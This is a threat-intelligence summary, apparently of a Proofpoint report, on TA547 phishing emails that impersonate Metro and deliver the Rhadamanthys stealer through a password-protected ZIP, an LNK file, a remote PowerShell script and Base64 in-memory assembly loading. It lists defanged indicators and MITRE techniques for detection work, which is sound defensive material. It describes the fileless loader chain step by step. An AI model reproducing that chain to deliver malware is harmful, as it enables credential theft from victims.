Keypoints
- Proofpoint observed TA547 distributing the Rhadamanthys information stealer for the first time by this actor.
- Phishing emails impersonated German retailer Metro and included a password-protected ZIP (password: MAR26) with an LNK file.
- Executing the LNK caused PowerShell to run a remote script (e.g., hxxps://bolibachan[.]com/g[.]txt) that contained a Base64-encoded Rhadamanthys payload.
- The PowerShell script decoded the Base64 payload, loaded it as a .NET assembly in memory, and executed the assembly entry point—avoiding disk writes.
- Deobfuscated PowerShell contained highly specific, grammatically correct comments above components, suggesting use of an LLM to generate or edit the code.
- Observed C2 infrastructure included domains and an IP: indscpm[.]xyz and 94[.]131[.]104[.]223:443 (first seen 26 Mar 2024).
MITRE Techniques
- [T1566] Phishing – Actor used targeted emails impersonating Metro to deliver a malicious ZIP attachment (‘Rechnung No:31518562’ and ‘in3 0gc-(94762)_6563.zip’).
- [T1204.001] User Execution: Malicious File – A user-executed LNK file in the ZIP initiated the attack chain (‘password-protected ZIP file (password: MAR26) containing an LNK file’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – The LNK invoked PowerShell which ran a remote script and executed commands to decode and load the payload (‘triggered PowerShell to run a remote PowerShell script’).
- [T1140] Deobfuscate/Decode Files or Information – The PowerShell script decoded a Base64-encoded executable stored in a variable before loading it (‘decoded the Base64-encoded Rhadamanthys executable file stored in a variable’).
- [T1620] Reflective Code Loading – The decoded content was loaded as an assembly into memory and its entry point executed without writing to disk (‘loaded it as an assembly into memory and then executed the entry point of the assembly’).
- [T1027] Obfuscated Files or Information – The attack used encoding/obfuscation to conceal the payload in variables and embedded Base64 content (‘Base64-encoded Rhadamanthys executable file stored in a variable’).
Indicators of Compromise
- [URL] PowerShell payload hosting – hxxps://bolibachan[.]com/g[.]txt (PowerShell payload fetched 26 Mar 2024)
- [Domain] Rhadamanthys C2 – indscpm[.]xyz (Rhadamanthys command-and-control observed 26 Mar 2024)
- [IP:Port] Rhadamanthys C2 – 94[.]131[.]104[.]223:443 (Rhadamanthys command-and-control observed 26 Mar 2024)
- [Email sender] Phishing sender address – rechnung.metro.de@metro-delivery[.]com (used to impersonate Metro in phishing emails)
- [Filename & password] Delivery artifact – in3 0gc-(94762)_6563.zip (contains LNK); password: MAR26
Emails used a password-protected ZIP attachment (password: MAR26) containing an LNK file; executing the LNK launched a PowerShell command that retrieved a remote script (notably hosted at hxxps://bolibachan[.]com/g[.]txt). The remote PowerShell contained Base64-encoded data which it decoded into a Rhadamanthys executable stored in memory rather than written to disk.
The decoded payload was loaded as a .NET assembly in memory and its entry point executed, enabling fileless execution and subsequent network communications to command-and-control infrastructure (examples: indscpm[.]xyz and 94[.]131[.]104[.]223:443). The PowerShell used obfuscation/encoding techniques to conceal the payload and the script included unusually specific, grammatically correct comments above code components—characteristics consistent with LLM-generated code.
Indicators to triage include the delivery URL (bolibachan[.]com/g[.]txt), the observed C2 domain and IP, the ZIP/LNK delivery pattern, and the ZIP password (MAR26). Detection should focus on the execution chain: LNK-triggered PowerShell retrieval, Base64 decoding in scripts, in-memory assembly loading, and outbound connections to the listed C2 infrastructure.